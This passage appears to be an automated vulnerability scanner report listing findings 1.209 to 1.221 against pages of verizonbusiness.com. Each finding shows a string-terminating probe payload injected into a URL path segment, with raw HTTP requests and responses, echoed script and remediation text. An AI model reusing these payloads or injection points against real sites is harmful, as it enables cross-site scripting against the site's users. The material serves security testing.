hbx.mlc="/error/Products/mobility/program-management7840c";247aa4cf98/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.209. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/voice-messaging/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24949'%3b15adafaf5b9 was submitted in the REST URL parameter 1. This input was echoed as 24949';15adafaf5b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products24949'%3b15adafaf5b9/mobility/voice-messaging/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Date: Wed, 17 Nov 2010 00:46:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products24949';15adafaf5b9/mobility/voice-messaging/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.210. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/voice-messaging/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3a86"%3b3cce78453f4 was submitted in the REST URL parameter 1. This input was echoed as c3a86";3cce78453f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsc3a86"%3b3cce78453f4/mobility/voice-messaging/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsc3a86";3cce78453f4/mobility/voice-messaging/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.211. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/voice-messaging/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d26fe"%3bac4be014476 was submitted in the REST URL parameter 2. This input was echoed as d26fe";ac4be014476 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilityd26fe"%3bac4be014476/voice-messaging/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobilityd26fe";ac4be014476/voice-messaging/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.212. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/voice-messaging/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d58f'%3bd6918e1f5ed was submitted in the REST URL parameter 2. This input was echoed as 4d58f';d6918e1f5ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility4d58f'%3bd6918e1f5ed/voice-messaging/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:34 GMT
Content-Type: text/html
Content-Length: 42333
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility4d58f';d6918e1f5ed/voice-messaging/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.213. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/voice-messaging/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f81dd"%3b7fbe73ab643 was submitted in the REST URL parameter 3. This input was echoed as f81dd";7fbe73ab643 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/voice-messagingf81dd"%3b7fbe73ab643/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/voice-messagingf81dd";7fbe73ab643/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.214. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/voice-messaging/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab08f'%3b7cb4ab0f46a was submitted in the REST URL parameter 3. This input was echoed as ab08f';7cb4ab0f46a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/voice-messagingab08f'%3b7cb4ab0f46a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:50 GMT
Content-Type: text/html
Content-Length: 43684
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/voice-messagingab08f';7cb4ab0f46a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.215. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/wireless-devices/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32e7c'%3bfd9cfa37da7 was submitted in the REST URL parameter 1. This input was echoed as 32e7c';fd9cfa37da7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products32e7c'%3bfd9cfa37da7/mobility/wireless-devices/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:37 GMT
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products32e7c';fd9cfa37da7/mobility/wireless-devices/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.216. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/wireless-devices/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efe60"%3b03077da2f15 was submitted in the REST URL parameter 1. This input was echoed as efe60";03077da2f15 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsefe60"%3b03077da2f15/mobility/wireless-devices/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsefe60";03077da2f15/mobility/wireless-devices/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIM
...[SNIP]...

1.217. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/wireless-devices/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c40cd'%3b9862982ca56 was submitted in the REST URL parameter 2. This input was echoed as c40cd';9862982ca56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilityc40cd'%3b9862982ca56/wireless-devices/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobilityc40cd';9862982ca56/wireless-devices/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.218. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/wireless-devices/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39ccf"%3bd4482b29410 was submitted in the REST URL parameter 2. This input was echoed as 39ccf";d4482b29410 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility39ccf"%3bd4482b29410/wireless-devices/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:43 GMT
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility39ccf";d4482b29410/wireless-devices/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.219. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/wireless-devices/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 822cc"%3b9f41d42046d was submitted in the REST URL parameter 3. This input was echoed as 822cc";9f41d42046d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/wireless-devices822cc"%3b9f41d42046d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43686
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
bx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/wireless-devices822cc";9f41d42046d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.220. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/wireless-devices/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9615'%3b2d9eec93f80 was submitted in the REST URL parameter 3. This input was echoed as d9615';2d9eec93f80 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/wireless-devicesd9615'%3b2d9eec93f80/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43684
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/wireless-devicesd9615';2d9eec93f80/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.221. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71c7e"%3b0e5d8892147 was submitted in the REST URL parameter 1. This input was echoed as 71c7e";0e5d8892147 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products71c7e"%3b0e5d8892147/networking/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:44:21 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
